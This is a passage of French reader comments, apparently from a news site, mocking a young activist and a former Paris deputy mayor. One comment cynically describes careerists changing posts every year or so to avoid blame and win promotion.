    Et voici le résultat sur un jeune qui devait être un peu naïf et s’est fait embrigadé dans de beaux discours complètement débiles portant toujours les mêmes refrains 


  • jamjam 14 novembre 22:37

    Ceci me fait penser à l’ex premier adjoint d’Hidalgo (je ne me rappelle plus de son nom) qui lui aussi, responsable UNEF, a traîné des années à la fac dans des études du même style. Mais lui avait des parents plus fortunés...


    • kimonovert 15 novembre 17:12

      @kimonovert J’ai toujours à l’idée une remarque émise lors d’une discussion « Pour être »feignant« (fainéant), faut être intelligent ! »... Et bien, ceux (l’élite) qui ont tout compris font en sorte de gérer une carrière par modules d’environ 1 an-18 mois, durée pour intégrer tous les tenants et aboutissants d’un poste...durant ce délai, vous êtes pour votre hierachie, un débutant qu’on excusera pour un tas de raisons, surtout si il prend bien garde de ne rien faire, ce qui n’empêche aucunement de participer...vous faites en sorte de postuler à un nouveau poste en principe mieux payé..on ne pourra vous objecter aucun avis défavorable car vous n’avez encore rien fait, celui qui ne fait rien ne peut pas se tromper !...donc vous serez promu...ainsi va la vie !


Réagir